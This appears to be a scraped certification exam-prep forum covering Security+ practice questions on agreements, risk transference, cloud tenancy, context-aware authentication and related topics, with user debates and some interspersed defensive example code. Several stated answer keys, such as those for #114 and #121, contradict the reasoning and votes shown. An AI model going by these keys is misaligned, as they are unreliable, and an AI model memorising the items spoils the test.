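            "trigger_detail": trigger.get("detail", ""),
        })
    return alerts


def run_demo() -> list:
    """Correlate the constructed sample; expect exactly one alert (tok_7f3a)."""
    return correlate(parse_events(SAMPLE_LOGS))


if __name__ == "__main__":
    for alert in run_demo():
        print(json.dumps(alert))
```

Of the three tokens in the sample only tok_7f3a fires: tok_91cc never had a malicious request, and tok_55e0 is reused on the same service and then on mail outside the five-minute window.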

  Lars87 4 months, 3 weeks ago


Selected Answer: A
SIEM, I think, is correct.
upvoted 1 times

  okay123 5 months ago


The software analyzes the log entries to identify signs of malicious activity. In addition, since the system gathers events from different sources
across the network, it can recreate the timeline of an attack, enabling a company to determine the nature of the attack and its impact on the
business.

https://www.techtarget.com/searchsecurity/definition/security-information-and-event-management-SIEM

I thought D, but the key word is different devices, so SIEM correlation, I think.


upvoted 1 times


Question #110 Topic 1

Two organizations plan to collaborate on the evaluation of new SIEM solutions for their respective companies. A combined effort from both
organizations' SOC teams would speed up the effort. Which of the following can be written to document this agreement?

A. MOU

B. ISA

C. SLA

D. NDA

Correct Answer: A

Community vote distribution


A (100%)

  Gravoc Highly Voted  4 months, 2 weeks ago


MOU - Memorandum of Understanding
MOA - Memorandum of Agreement

A MOU is the initialization phase for two companies who plan to work together. It establishes what each company is looking to achieve/get out of
the arrangement. It's not a signed contract.

A MOA is a step above the MOU. It's a signed contract that indicates both parties understand and agree with the terms placed forward by both
parties.
upvoted 13 times

  RonWonkers 4 months, 1 week ago


Thanks for the explanation
upvoted 1 times

  stoneface Highly Voted  5 months ago


Selected Answer: A
A document that regulates security-relevant aspects of an intended connection between an agency and an external system. It regulates the
security interface between any two systems operating under two different distinct authorities. It includes a variety of descriptive, technical,
procedural, and planning information. It is usually preceded by a formal MOA/MOU that defines high- level roles and responsibilities in
management of a cross-domain connection.
upvoted 11 times

  stoneface 5 months ago


Add ISA at the beginning -> source https://csrc.nist.gov/glossary/term/interconnection_security_agreement
upvoted 2 times

  ronniehaang Most Recent  4 days, 15 hours ago


Selected Answer: A
A. MOU (Memorandum of Understanding) is the best option to document the agreement between two organizations to collaborate on the
evaluation of new SIEM solutions.

An MOU is a non-binding agreement between two or more parties outlining the goals and objectives of a project or collaboration. It outlines the
responsibilities, resources, and expectations of each party involved, and serves as a framework for future cooperation and collaboration. In this
case, the MOU between the two organizations would outline the purpose and goals of their collaboration to evaluate new SIEM solutions, the
roles and responsibilities of each organization's SOC team, and any timelines or expectations for the evaluation process.

An MOU is a good option as it provides a clear understanding of the expectations and responsibilities of both organizations without binding
either organization to a specific course of action or committing to a formal agreement.
upvoted 1 times

  DALLASCOWBOYS 5 days, 18 hours ago


A. MOU. It just states they are collaborating, thus not requiring a legal agreement.
upvoted 2 times


Question #111 Topic 1

The Chief Information Security Officer wants to prevent exfiltration of sensitive information from employee cell phones when using public USB
power charging stations. Which of the following would be the BEST solution to implement?

A. DLP

B. USB data blocker

C. USB OTG

D. Disabling USB ports

Correct Answer: B

Community vote distribution


B (67%) A (33%)

  FQ Highly Voted  4 months, 3 weeks ago


Selected Answer: A
The question is talking about PUBLIC USB power charging stations; the CISO certainly cannot place a USB data blocker on all public USB ports in
the world!
The CISO also can't disable employees' cell phone ports, as these are usually personal property.
USB OTG is obviously doing the opposite of what's required if used.

DLP is the answer, and it can be implemented as follows:

1. Create a User Group based on AD (you will need to have a Directory Connection configured).
2. Create a policy that detects the data AND includes a rule for the User Group. This way it will ONLY work for those users.
3. Test to make sure the policy works for ONLY those users.
4. Create a Response Rule that BLOCKS Endpoint AND only applies to USB.
5. Apply this new Response Rule to the Policy (Response Rule tab).
upvoted 17 times

  Blake89 3 weeks ago


You and the 15 others who upvoted are what's wrong with these forums. B is the answer.
upvoted 3 times

  NBE 4 days ago


You are wrong, A is correct.
upvoted 1 times

  Jakalan7 4 months, 1 week ago


That's correct, he can't place data blockers on all public USB ports, but you can get them as portable peripherals that users can carry around
with them, they're only small and can just sit on the end of the charging cable.
upvoted 6 times

  ExamTopicsDiscussor 4 months ago


This. USB data blockers are PORTABLE. It's what you connect to the end of the cord.
upvoted 3 times

  zf1343 1 week ago


The question is about enforcement when dealing with sensitive information. What if user accidentally plugs in without data blocker? Go
with DLP to be sure.
upvoted 1 times

  comeragh Highly Voted  5 months ago


Selected Answer: B
B looks to be correct here
upvoted 14 times

  Blake89 Most Recent  3 weeks ago


Selected Answer: B
The CompTIA Sec+ Study Guide book literally talks about USB data blockers when using public charging stations. Y'all overthink way too much
sometimes.
upvoted 9 times

  LaoX 1 month ago


Selected Answer: A
The CISO shouldn't place a USB data blocker on personnel's device but a DLP is best to implement.
upvoted 1 times


  jhfdkjshfkjdsho 1 month, 2 weeks ago


Selected Answer: B
It says public charging... This is not under the control of the company. You can't apply DLP... etc for a charging station in an airport. The
employee can use a USB condom that doesn't have data pins.
upvoted 2 times

  FMMIR 1 month, 3 weeks ago


Selected Answer: B
The best solution to prevent exfiltration of sensitive information from employee cell phones when using public USB power charging stations
would be to use a USB data blocker. A USB data blocker is a device that can be used to physically block the data pins on a USB cable,
preventing data transfer while still allowing the device to be charged. This would prevent employees from accidentally or maliciously transferring
sensitive data from their cell phones to the public charging station. Options A, C, and D would not be effective in preventing this type of data
exfiltration.
upvoted 2 times

  okay123 2 months, 2 weeks ago


Selected Answer: B
Y'all are over thinking this, it's B. Data blockers are portable and it's used for this very purpose.
upvoted 4 times

  The_F00L 3 months ago


I'm going with A. Anyone who deals with users knows there's no way you're going to get them to reliably use portable USB data blockers.
Implementing DLP (and disabling OTG) is the only dependable way to tackle this issue.
upvoted 2 times

  lordguck 3 months ago


The use of a USB data blocker can neither be enforced (without using a soldering iron at least) nor controlled, so it's no help in prevention of
exfiltration. It's A then.
upvoted 3 times

  CapJackSparrow 3 months, 2 weeks ago


Selected Answer: A
Due to Dion's BYOD video (Video #51 on Udemy) I'd say it's DLP.
upvoted 3 times

  CapJackSparrow 3 months, 2 weeks ago


Dions video (Video #51) specifically says companies use MDM to enable DLP solutions. Seems DLP would be the MOST practical. While USB
data blocker would work it would not be very practical. Hate questions like these because you can overthink your way to the wrong answer
easily.
upvoted 1 times

  Tomtom11 3 months, 3 weeks ago


Selected Answer: B
A USB data blocker prevents attackers from infecting a device with malware or stealing data. When charging your phone in locations such as
airports, or other unknown power sources, the use of a USB data blocker protects the phone but allows it to charge.
upvoted 4 times

  Fastytop 3 months, 3 weeks ago


Selected Answer: A
I think A and B are correct, but here they asked about the best way to prevent it. If the company has 100 employees, that means we must think about
the cost, and about whether the employee forgets the USB, and more about updates. I think that it is DLP because it is not forgotten by employees,
because it exists in the mobile phone, and also its costs will be lower and its updates are better and keep pace with the most recent developments
in viruses.
upvoted 1 times

  andrizo 3 months, 3 weeks ago


https://packinglighttravel.com/travel-tech/do-you-need-a-usb-data-blocker/
upvoted 1 times

  VendorPTS 4 months ago


Selected Answer: B
USB data blocker - Also sometimes called a USB Condom. This is the only thing that will block physical access to your USB. DLP can't hope to
address all the potential exploits that are possible when an attacker has physical USB data access to your device.
https://infotracer.com/infocenter/how-to-use-a-usb-condom-and-why/
upvoted 4 times

  Gravoc 4 months, 2 weeks ago


This is a tough one, but ultimately I believe DLP to be the most correct. Look into Microsoft Intune and McAfee MobileIron. They are mobile
application DLP solutions that offer reach beyond the corporate network boundaries.

The question asks for the BEST solution. USB data blockers are good, but they're reliant on the employee actually using them. A DLP solution
such as MobileIron forces compliance by locking corporate resources behind a secure application. For example, users under any mobile device policy,
such as BYOD, CYOD, and COPE, who want to access their corporate email on their phone will need to sign into the MobileIron
application in order to be granted visibility to their corporate email account. Since the emails are being read/sent through the MobileIron
application, safeguards can be applied even on an outside-network mobile level. If an employee attempts to send a customer's social security
number, MobileIron will either block it, alert on it, or both, contingent on how the company set up the MobileIron service to work.
upvoted 3 times

  Gravoc 4 months, 2 weeks ago


Oops, to add onto this: DLP also offers data exfiltration prevention and detection. Going back to our email example, if a user plugs into a
public USB port that is compromised and signs into their secure MobileIron application, the MobileIron application acts as a data blocker of
its own.
upvoted 2 times

  tibetbey 5 months ago


Selected Answer: B
USB Data Blocker: the main purpose of using one is to eliminate the risk of infecting your phone or tablet with malware, and even prevent
hackers from installing/executing any malicious code to access your data.
upvoted 6 times

Question #112 Topic 1

The board of directors at a company contracted with an insurance firm to limit the organization's liability. Which of the following risk management
practices does this BEST describe?

A. Transference

B. Avoidance

C. Mitigation

D. Acknowledgement

Correct Answer: A

Community vote distribution


A (100%)

  stoneface Highly Voted  5 months ago


Selected Answer: A
organization's liability -> organization's RESPONSIBILITY
upvoted 7 times

  DALLASCOWBOYS 5 days, 18 hours ago


A. Insurance is transferring the risk to the insurance company
upvoted 1 times

  Boubou480 4 weeks, 1 day ago


Selected Answer: A
Insurance = Transfer
upvoted 2 times

  FMMIR 1 month, 3 weeks ago


Selected Answer: A
The board of directors at a company contracted with an insurance firm to limit the organization's liability BEST describes the risk management
practice of transference. Transference is the process of transferring the risk of loss from one party to another, typically through the use of
insurance. In this case, the company is transferring the risk of potential liability to the insurance firm by purchasing an insurance policy. This
allows the company to limit its potential losses in the event of a liability claim. Options B, C, and D do not accurately describe the situation
described in the question.
upvoted 1 times

  db97 4 months, 1 week ago


If something happens, the insurance company will assume responsibility (Transference).
upvoted 2 times


Question #113 Topic 1

Which of the following is a risk that is specifically associated with hosting applications in the public cloud?

A. Unsecured root accounts

B. Zero-day

C. Shared tenancy

D. Insider threat

Correct Answer: C

Community vote distribution


C (85%) D (15%)

  IGUESS Highly Voted  1 year ago


Shared Tenancy Vulnerabilities.

In a multi-tenant environment, such as the cloud, a “container” vulnerability can allow an attacker to compromise containers of other tenants on
the same host. Flaws in chip design can also result in the compromise of tenant information in the cloud through side-channel attacks.
upvoted 15 times

  DALLASCOWBOYS Most Recent  5 days, 18 hours ago


C. Shared tenancy is the risk associated with the Cloud.
upvoted 1 times

  FMMIR 1 month, 3 weeks ago


Selected Answer: C
A risk that is specifically associated with hosting applications in the public cloud is shared tenancy. Shared tenancy refers to the practice of
multiple customers sharing the same physical infrastructure in a cloud environment. This can create security risks, as the actions of one customer
can potentially impact the security and performance of other customers on the same infrastructure. Options A, B, and D are not specifically
associated with hosting applications in the public cloud, although they can be potential risks in any computing environment.
upvoted 2 times

  Sir_Learnalot 2 months, 3 weeks ago


Selected Answer: C
"C" shared tenancy is a cloud specific threat. Insider threats are also applicable to on-prem
upvoted 1 times

  Jakalan7 4 months, 2 weeks ago


Selected Answer: C
The answer has to be C, since A, B and D are not specific to cloud platforms.
upvoted 2 times

  ishallgetit 9 months, 2 weeks ago


Selected Answer: C
"specifically associated with hosting applications in the public cloud"
C: shared tenancy
upvoted 4 times

  Branchflake 10 months, 1 week ago


I read this twice and still missed the "public " cloud. Shared Tenancy
upvoted 1 times

  Dunzel 10 months, 3 weeks ago


Why would it be D? How is an insider threat "specifically associated with hosting applications in the public cloud?" Insider threats are everywhere
- not just in the cloud.
upvoted 2 times

  CLAW_ 11 months ago


I didn't read the question properly and chose Unsecured Accounts; this is wrong. The correct answer is Shared Tenancy, given that the clue in the
question is "Public" cloud.
upvoted 2 times

  szl0144 11 months, 3 weeks ago


Selected Answer: C
C is the correct answer, cloud server are multi-tenant
upvoted 2 times


  bugrovac 1 year ago


Selected Answer: D
Correct Answer: D
upvoted 2 times

  ansenlool88 11 months, 3 weeks ago


Insider threat is also present on different types of cloud, on-premises locations and any datacenter, LAN or WAN. I don't think D is correct. The keywords in
the question are PUBLIC CLOUD.
upvoted 3 times

  greenerme 12 months ago


An insider threat is a malicious threat to an organization that comes from people within the organization, such as employees, former
employees, contractors or business associates, who have inside information concerning the organization's security practices, data and
computer systems
upvoted 2 times


Question #114 Topic 1

DDoS attacks are causing an overload on the cluster of cloud servers. A security architect is researching alternatives to make the cloud
environment respond to load fluctuation in a cost-effective way. Which of the following options BEST fulfills the architect's requirements?

A. An orchestration solution that can adjust scalability of cloud assets

B. Use of multipath by adding more connections to cloud storage

C. Cloud assets replicated on geographically distributed regions

D. An on-site backup that is displayed and only used when the load increases

Correct Answer: D

Community vote distribution


A (100%)

  stoneface Highly Voted  5 months, 1 week ago


Selected Answer: A
A. An orchestration solution that can adjust scalability of cloud assets -> this is the correct answer IMO - this is what elasticity in cloud is all
about, we are only creating new resources when there is a workload spike.
B. Use of multipath by adding more connections to cloud storage -> this doesn't address the issue of dealing with the additional load on the
servers
C. Cloud assets replicated on geographically distributed regions -> hot or warm recovery sites ( not cost effective )
D. An on-site backup that is displayed and only used when the load increases ( not cost effective since the on-site will be always on behind the
scenes)
upvoted 25 times

  Gino_Slim 3 months, 1 week ago


In stoneface we trust (that means this is the right answer)
upvoted 4 times

  carpathia Most Recent  2 months, 1 week ago


Selected Answer: A
It cannot be B: "What is multipathing in cloud computing?
Multipathing, also called SAN multipathing or I/O multipathing, is the establishment of multiple physical routes between a server and the storage
device that supports it."
upvoted 1 times

  RonWonkers 4 months, 2 weeks ago


Selected Answer: A
I think A
upvoted 1 times

  Gravoc 4 months, 2 weeks ago


I agree with stoneface on A. Remember that backups are expensive. Which is the entire reason for the convoluted process of hot, warm, and cold
sites.

Scaling cloud infrastructures can experience lag during the periods of high activity, where other assets have to either be added, or become
active. This is the compromise for a cost-effective solution that scales. The company could go for a system that is absolutely overkill on assets at
all times, in preparation for those brief peak moments. But this is expensive, and unlikely to be taken by most companies. Only case you would
want to use one of these is if you have a sensitive or critical service that MUST remain online. Stock exchange servers, military servers, bank
servers, etc. come to mind for this criteria.
upvoted 3 times

  lucasvs_ 5 months ago


Selected Answer: A
Yes, I do
upvoted 1 times


Question #115 Topic 1

Which of the following documents provides expectations at a technical level for quality, availability, and responsibilities?

A. EOL

B. SLA

C. MOU

D. EOSL

Correct Answer: B

Community vote distribution


B (100%)

  Strykar Highly Voted  4 months, 1 week ago


Selected Answer: B
This site needs a Dark Mode.
upvoted 17 times

  snofear 4 months ago


Use Dark Reader-Chrome extension
upvoted 7 times

  J_Ark1 3 months ago


thanks for that :)
upvoted 2 times

  banditring 4 months, 1 week ago


AGREED!
upvoted 3 times

  comeragh Highly Voted  5 months ago


Selected Answer: B
B - Service Level Agreement (SLA)
upvoted 7 times

  Sandon Most Recent  2 weeks ago


An old ITIL question. Definitely B
upvoted 1 times

  KingDrew 3 weeks ago


Selected Answer: B
B: SLA (Service Level Agreement)
upvoted 1 times

  FMMIR 1 month, 3 weeks ago


Selected Answer: B
A document that provides expectations at a technical level for quality, availability, and responsibilities is a Service Level Agreement (SLA). An SLA
is a contract between a service provider and a customer that specifies the level of service that the provider will deliver. This typically includes
technical details such as uptime, response times, and performance criteria. The SLA is used to ensure that the customer receives the level of
service that they have agreed to and that the provider is held accountable for meeting those expectations. Options A, C, and D are not related to
the technical level of service expectations. EOL refers to the end of life for a product or service, MOU is a memorandum of understanding, and
EOSL is the end of service life.
upvoted 2 times


Question #116 Topic 1

Which of the following is an example of transference of risk?

A. Purchasing insurance

B. Patching vulnerable servers

C. Retiring outdated applications

D. Application owner risk sign-off

Correct Answer: A

Community vote distribution


A (100%)

  comeragh Highly Voted  5 months ago


Selected Answer: A
Correct answer A here
upvoted 9 times

  rodwave Most Recent  2 months, 3 weeks ago


Selected Answer: A
Answer: Purchasing Insurance

Cyber insurance covers a business' liability for a data breach involving sensitive customer information like health records, credit card numbers,
account numbers etc. A few things insurance generally handle are legal fees, notifying customers of the data breach, and repairing damaged
systems.

Risk transference is about assigning risk to a third-party. The risk here being the financial loss that can be incurred after a data breach from legal
fees, repairing system etc. The organization is assigning this risk to an insurance company.
upvoted 3 times

  Sarooor 3 months ago


can someone explain why the correct
answer is A??
upvoted 1 times


Question #117 Topic 1

An employee received a word processing file that was delivered as an email attachment. The subject line and email content enticed the employee
to open the attachment. Which of the following attack vectors BEST matches this malware?

A. Embedded Python code

B. Macro-enabled file

C. Bash scripting

D. Credential-harvesting website

Correct Answer: B

Community vote distribution


B (100%)

  IQ30 Highly Voted  5 months ago


Jason Dion notes:
Macro
o Virus embedded into a document and is executed when the document is opened by the user
upvoted 11 times

  rodwave Most Recent  2 months, 3 weeks ago


Selected Answer: B
Answer: Macro-enabled file

Phishing emails with a Word document attachment typically will have macros that can be run for malicious purposes. Macros are scripts that can
run whatever you want and however many times you want them to run; they are generally used for automating frequently used tasks.

Since macros can practically do whatever you want, they can be used for malicious purposes such as infecting other files, or
downloading/installing other malicious software.

Macros would normally run as soon as the document is opened, but now macros are disabled in Office apps by default, so you would need to
manually enable macros on the file for them to run.
upvoted 3 times

  samwin111 3 months, 3 weeks ago


Selected Answer: B
Python will not run on doc files
Macro runs on doc files
upvoted 2 times

  comeragh 5 months ago


Selected Answer: B
B - correct answer here
upvoted 2 times


Question #118 Topic 1

A security proposal was set up to track requests for remote access by creating a baseline of the users' common sign-in properties. When a
baseline deviation is detected, an MFA challenge will be triggered. Which of the following should be configured in order to deploy the proposal?

A. Context-aware authentication

B. Simultaneous authentication of equals

C. Extensive authentication protocol

D. Agentless network access control

Correct Answer: A

Community vote distribution


A (100%)

  stoneface Highly Voted  5 months ago


Selected Answer: A
Context-Aware authentication -> An access control scheme that verifies an object's identity based on various environmental factors, like time,
location, and behavior.
upvoted 26 times

  J_Ark1 3 months ago


yes i agree
upvoted 1 times

  Gravoc Most Recent  4 months, 2 weeks ago


Context: "The circumstances that form the setting for an event, statement, or idea, and in terms of which it can be fully understood and
assessed."

CAA is likely correct, as the context is that the login attempt deviates from the baseline, triggering an additional authentication layer.
upvoted 4 times
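Context-aware authentication as the question and stoneface's definition describe it, as an added example that is not part of the original page: a per-user baseline of sign-in properties is built from past successful sign-ins, and a new attempt that deviates enough from that baseline triggers an MFA challenge. The property names, weights and threshold are assumptions chosen for illustration, and all sign-in records are constructed sample data.

```python
"""Context-aware authentication: baseline a user's usual sign-in properties and
step up to MFA when a new sign-in deviates from them.

Added example for the Question #118 scenario; not code from the original page.
The property names (country, device_id, asn, hour), the weights and the
threshold are assumptions, and every record below is constructed."""
from collections import Counter, defaultdict
from dataclasses import dataclass

# Constructed history of previously accepted sign-ins, one dict per sign-in.
SAMPLE_HISTORY = [
    {"user": "alice", "country": "US", "device_id": "lap-01", "asn": "AS7922", "hour": 9},
    {"user": "alice", "country": "US", "device_id": "lap-01", "asn": "AS7922", "hour": 10},
    {"user": "alice", "country": "US", "device_id": "phone-01", "asn": "AS22394", "hour": 18},
    {"user": "alice", "country": "US", "device_id": "lap-01", "asn": "AS7922", "hour": 8},
    {"user": "bob", "country": "DE", "device_id": "lap-07", "asn": "AS3320", "hour": 14},
    {"user": "bob", "country": "DE", "device_id": "lap-07", "asn": "AS3320", "hour": 15},
]

# Weight added to the deviation score when a property falls outside the
# baseline (assumed values). A score >= MFA_THRESHOLD triggers the challenge.
WEIGHTS = {"country": 3, "device_id": 2, "asn": 1, "hour": 1}
MFA_THRESHOLD = 2


@dataclass
class Baseline:
    seen: dict  # property name -> Counter of values observed for this user


def build_baselines(history):
    """Summarise per-user sign-in history into a Baseline of observed values."""
    per_user = defaultdict(lambda: {p: Counter() for p in WEIGHTS})
    for rec in history:
        for prop in WEIGHTS:
            per_user[rec["user"]][prop][rec[prop]] += 1
    return {user: Baseline(seen=props) for user, props in per_user.items()}


def _hour_is_usual(counter, hour):
    """An hour is 'usual' if it lies within +/-2 hours of any seen sign-in hour."""
    return any(abs(hour - h) <= 2 for h in counter)


def evaluate_signin(baselines, attempt):
    """Return (score, deviations, require_mfa) for one sign-in attempt.

    A user with no baseline is always challenged: there is nothing to compare
    the attempt against, so the safe default is to step up."""
    base = baselines.get(attempt["user"])
    if base is None:
        return (MFA_THRESHOLD, ["no_baseline"], True)
    score, deviations = 0, []
    for prop, weight in WEIGHTS.items():
        counter = base.seen[prop]
        value = attempt[prop]
        usual = _hour_is_usual(counter, value) if prop == "hour" else value in counter
        if not usual:
            score += weight
            deviations.append(prop)
    return (score, deviations, score >= MFA_THRESHOLD)


if __name__ == "__main__":
    baselines = build_baselines(SAMPLE_HISTORY)
    # Constructed attempt: known user, new country, new device, new network, odd hour.
    attempt = {"user": "alice", "country": "RO", "device_id": "lap-99", "asn": "AS9050", "hour": 3}
    score, deviations, mfa = evaluate_signin(baselines, attempt)
    print(f"score={score} deviations={deviations} require_mfa={mfa}")
```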


Question #119 Topic 1

Which of the following secure coding techniques makes compromised code more difficult for hackers to use?

A. Obfuscation

B. Normalization

C. Execution

D. Reuse

Correct Answer: A

Community vote distribution


A (100%)

  varun0 Highly Voted  5 months ago


Selected Answer: A
A is correct
upvoted 8 times

  ScottT 4 months, 3 weeks ago


https://en.wikipedia.org/wiki/Obfuscation_(software)
upvoted 1 times

  Fitzd Highly Voted  4 months, 3 weeks ago


Three of the most common techniques used to obfuscate data are encryption, tokenization, and data masking.
upvoted 6 times

  madmax1984 Most Recent  1 week, 6 days ago


Selected Answer: A
Code obfuscation makes the code more difficult to read. Stored procedures are used with SQL databases and can be used for input validation.
Normalization refers to organizing tables and columns in a database to reduce redundant data and improve overall database performance.
upvoted 1 times

  xxxdolorxxx 2 weeks, 1 day ago


Selected Answer: A
A is the right answer here.
I know because I've done exactly that for web dev stuff, lol.
upvoted 1 times

  rodwave 2 months, 3 weeks ago


Selected Answer: A
Answer: Obfuscation

Obfuscation is the action of making something obscure, unclear, or unintelligible. In software development, obfuscation is the act of creating
code that is difficult for humans or computers to understand.
upvoted 4 times

  Gravoc 4 months, 2 weeks ago


Don't forget that obfuscation works in the reverse as well. Hackers usually obfuscate their malware and viruses to avoid signature detectors.
Things such as writing arbitrary and benign looking code, and sneaking malicious functions into it. Or hackers also like to stretch the key length
of their encryption, or use naming conventions that are only easily understandable by the person who created it.
upvoted 1 times


Question #120 Topic 1

As part of a security compliance assessment, an auditor performs automated vulnerability scans. In addition, which of the following should the
auditor do to complete the assessment?

A. User behavior analysis

B. Packet captures

C. Configuration reviews

D. Log analysis

Correct Answer: A

Community vote distribution


D (44%) C (44%) 11%

  stoneface Highly Voted  5 months ago


Selected Answer: C
Configuration reviews should also be performed.
upvoted 26 times

  hazeleyes Highly Voted  4 months, 3 weeks ago


Selected Answer: D
D. log analysis. It's not C because configuration review is part of the vulnerability scan. Vulnerability scan can produce false positives, which is
why its effectiveness can be enhanced by log reviews to see whether an identified vulnerability is in fact valid.
upvoted 24 times

  zf1343 1 week ago


Compliance is all about configuration. Log analysis and packet captures are more of troubleshooting tools than compliance factors.
upvoted 2 times

  DALLASCOWBOYS Most Recent  4 days, 12 hours ago


C. Configuration reviews. The auditor provides their opinion on the effectiveness of the operating controls. The auditor confirms that the controls
are functioning properly in a Type 2 report, and in a Type 1 report gives the auditor's opinion on the suitability of the design of the controls.
upvoted 1 times

  ronniehaang 4 days, 15 hours ago


Selected Answer: D
D. Log analysis

Log analysis is a critical component in the security compliance assessment process as it provides information about the activities taking place on
the system, including attempted or successful security breaches. This information can be used to identify patterns of malicious behavior and
determine if specific security policies are being violated. The auditor can analyze logs from firewalls, intrusion detection systems, web servers,
and other sources to gain a comprehensive view of the security posture of the system. The auditor can also use log analysis tools to identify
security incidents and perform in-depth forensic analysis to determine the root cause and extent of the breach. By combining automated
vulnerability scans with log analysis, the auditor can gain a more complete understanding of the system's security posture and ensure that the
organization is meeting compliance requirements.
upvoted 1 times

  pwino 3 days, 20 hours ago


I see someone's using AI productively. Lol.

As per ChatGPT - D. Log Analysis is correct for the reasons given above.
upvoted 1 times

  AC1984 3 weeks ago


Selected Answer: C
Configuration reviews is the next step
upvoted 2 times

  Waniey 1 month, 1 week ago


D. Vulnerability scanning does that. And deter known vulnerability
upvoted 1 times

  Gary_Phillips_2007 1 month, 2 weeks ago


Here’s what ChatGPT says:
The correct answer is C, Configuration reviews.

Performing automated vulnerability scans is a useful technique for identifying potential security vulnerabilities in a system. However, it is not
sufficient on its own to complete a comprehensive security compliance assessment. In addition to performing automated vulnerability scans, the
auditor should also review the system's configurations to ensure that they are in compliance with relevant security standards and guidelines.

User behavior analysis involves analyzing the actions and behaviors of users to identify potential security risks.

Packet captures involve capturing and analyzing the data packets transmitted over a network to identify potential security risks.

Log analysis involves reviewing and analyzing system logs to identify potential security risks.
upvoted 5 times

  FMMIR 1 month, 3 weeks ago


Selected Answer: C
In order to complete a security compliance assessment, the auditor should perform configuration reviews in addition to automated vulnerability
scans. Configuration reviews involve examining the settings and configurations of systems and devices to ensure that they are in compliance
with security standards and best practices. This can help to identify vulnerabilities or misconfigurations that may not be detected by automated
scans. In addition to configuration reviews, the auditor may also want to perform log analysis, user behavior analysis, and packet captures to
gain a more complete understanding of the organization's security posture. These additional steps can provide valuable information about
potential security issues and can help the auditor to make more accurate recommendations for improving the organization's security compliance.
upvoted 1 times

  tek7ila 1 month, 4 weeks ago


I did some reading, and I also think it should be D. Because, like other people said, configuration review is part of the vulnerability scan.
upvoted 1 times

  deeden 2 months ago


Selected Answer: C
Haven't encountered many auditors analyzing logs, other than to know that they exist and are being retained for a prescribed period. They do check
the hardening configurations though, especially those mentioned in company policies, making sure they are set as claimed.
upvoted 2 times

  FMMIR 2 months, 1 week ago


Selected Answer: C
Configuration reviews can help ensure that servers and network devices are securely configured, and alert you to any errors and
misconfigurations. While vulnerability assessments and penetration testing provide an analysis from an external point of view, configuration
reviews provide an in-depth view from within your servers and network devices.
upvoted 1 times

  carpathia 2 months, 2 weeks ago


Selected Answer: D
Under Security Assessment in this book I am studying, Config Review and Log review are under the Vulnerability scan. However, Log analysis
[syslog, SIEM etc] is listed separately in the same chapter, not under the vulnerability scan.
upvoted 1 times

  carpathia 2 months, 1 week ago


Even though, packet captures and Config review are also listed under the same chapter....
upvoted 1 times

  atrax 3 months, 2 weeks ago


I work in GRC for the DoD, D is correct
upvoted 3 times

  Gino_Slim 3 months, 1 week ago


Oh my....can't deny those credentials (lol)
upvoted 6 times

  rindrasakti 3 months, 3 weeks ago


Selected Answer: D
Vote for D because Configuration review is part of the vulnerability scan
upvoted 5 times

  CertAddict69 3 months, 3 weeks ago


Selected Answer: A
Am I the only person who thinks it is A, User Behavior Analysis? It would seem the ongoing vulnerability scanning would find flaws in the
systems, and the user behavior analysis would find flaws in the users?
upvoted 6 times

  Gino_Slim 3 months, 1 week ago


Yes, yes you are.
upvoted 2 times

  db97 4 months, 1 week ago


C - Configuration reviews
upvoted 3 times

  Strykar 4 months, 1 week ago

Selected Answer: D
It's D
upvoted 2 times


Question #121 Topic 1

A database administrator wants to grant access to an application that will be reading and writing data to a database. The database is shared by
other applications also used by the finance department. Which of the following account types is MOST appropriate for this purpose?

A. Service

B. Shared

C. Generic

D. Admin

Correct Answer: C

Community vote distribution


A (96%) 4%

  stoneface Highly Voted  5 months, 1 week ago


Selected Answer: A
Service accounts are a special type of non-human privileged account used to execute applications and run automated services, virtual machine
instances, and other processes. Service accounts can be privileged local or domain accounts, and in some cases, they may have domain
administrative privileges
upvoted 21 times

  DALLASCOWBOYS Most Recent  4 days, 11 hours ago


A. Service accounts are associated with applications and services.
upvoted 1 times

  nul8212 1 month, 2 weeks ago


Selected Answer: C
Generic account: a preset, standard, common, guest, fixed, shared, or anonymous user account.
upvoted 1 times

  Blake89 2 weeks, 2 days ago


Absolutely not. People like you need to stop commenting on these threads.
upvoted 5 times

  zharis 3 months, 1 week ago


Service accounts are used by scheduled processes and application server software such as databases
upvoted 1 times

  [Removed] 3 months, 3 weeks ago


Selected Answer: A
Service accounts associated with applications and services.
upvoted 1 times

  ergo54 3 months, 4 weeks ago


Selected Answer: A
Agreed, it's A. The study guide explicitly states that generic accounts are for many different individuals doing the same work, whereas a service
account is explicitly for an application/service to run its work.
upvoted 2 times

  RonWonkers 4 months, 2 weeks ago


Selected Answer: A
I think A is most appropriate
upvoted 1 times

  k9_462 5 months ago


Selected Answer: A
i would go with A-service account
upvoted 1 times


Question #122 Topic 1

A security analyst generated a file named host1.pcap and shared it with a team member who is going to use it for further incident analysis. Which
of the following tools will the other team member MOST likely use to open this file?

A. Autopsy

B. Memdump

C. FTK imager

D. Wireshark

Correct Answer: D

Community vote distribution


D (100%)

  DALLASCOWBOYS 4 days, 11 hours ago


D. Wireshark analyzes packet captures
upvoted 1 times

  xxxdolorxxx 2 weeks, 1 day ago


Selected Answer: D
Wireshark. Did this for my eJPT exam.
upvoted 1 times

  rodwave 2 months, 3 weeks ago


Selected Answer: D
Answer: Wireshark

PCAP or Packet Capture is an interface used for capturing live network packet data. PCAP files like 'host1.pcap' are data files created by
network analyzers like Wireshark that are used to collect and record packet data from a network. These files which can be used for analyzing the
network traffic.
==================================
Other Tools/Options
(A) Autopsy - A platform that provides digital forensic tools

(B) Memdump - The memdump tool is a program that can do memory dumps. A memory dump is the process of taking all data in RAM and
storing it on a hard drive for like applications or for the case of a system crash. The memdump tool will dump the contents of physical memory by
default.

(C) FTK Imager - Forensic Toolkit (FTK) is forensics software and FTK Imager is a tool that can be used to create forensic images. A forensic image is
basically a copy of an entire physical hard drive including files, folders etc.
upvoted 2 times

  Blake89 2 weeks, 2 days ago


Autopsy IS a TOOL, not a platform for multiple tools. Its main purpose is to view and recover data from storage devices. People like you need
to really stop talking in here.
upvoted 2 times

  Elyria 1 week, 4 days ago


How about you get a life and YOU stop commenting here. All I see under every discussion is you crying about other people participating.
Grow up.
upvoted 4 times

  Blake89 1 week, 3 days ago


Elyria, How about you quit crying about me calling out people who are talking nonsense and giving out false information? These are not
opinions, it's all factual. Take your little delicate sensitivities to Facebook.
upvoted 1 times

  RonWonkers 4 months, 2 weeks ago


Selected Answer: D
pcap is wireshark
upvoted 3 times

  Gravoc 4 months, 2 weeks ago


Wireshark. I've opened enough pcap's in wireshark to know this one :p.
upvoted 3 times


  okay123 5 months ago


Wireshark is a network packet analyzer. A network packet analyzer presents captured packet data in as much detail as possible.
upvoted 1 times

  comeragh 5 months ago


Selected Answer: D
D - Wireshark
